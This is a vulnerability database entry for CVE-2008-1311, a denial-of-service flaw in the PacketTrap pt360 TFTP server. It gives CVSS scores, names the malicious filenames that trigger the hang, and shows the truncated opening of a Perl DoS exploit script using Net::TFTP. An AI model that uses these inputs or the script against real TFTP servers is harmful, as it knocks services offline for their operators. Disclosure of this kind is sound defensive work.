5
CVSSv2

CVE-2008-1311

Published: 12/03/2008 Updated: 11/10/2018
CVSS v2 Base Score: 5 | Impact Score: 2.9 | Exploitability Score: 10
VMScore: 505
Vector: AV:N/AC:L/Au:N/C:N/I:N/A:P

Vulnerability Summary

The TFTP server in PacketTrap pt360 Tool Suite PRO 2.0.3901.0 and previous versions allows remote malicious users to cause a denial of service (daemon hang) by uploading a file named (1) '|' (pipe), (2) '"' (quotation mark), or (3) "<>" (less than, greater than); or (4) a file with a long name. NOTE: the issue for vector 4 might exist because of an incomplete fix for CVE-2008-1312.

Vulnerable Product Search on Vulmon Subscribe to Product

packettrap pt360 tool suite pro

Exploits

#!/usr/bin/perl # Jeremy Brown [0xjbrown41@gmailcom/jbrownsecblogspotcom] # PacketTrap TFTPD DoS (latest 2254590 tested) -- wwwpackettrapcom # Must have Net::TFTP installed (easy to install, 'cpan' then 'install Net::TFTP' ;) # A product of tftpfuzzpl (coming soon) use Net::TFTP; use Getopt::Std; $tftp = Net::TFTP-&gt;new("1921680112" ...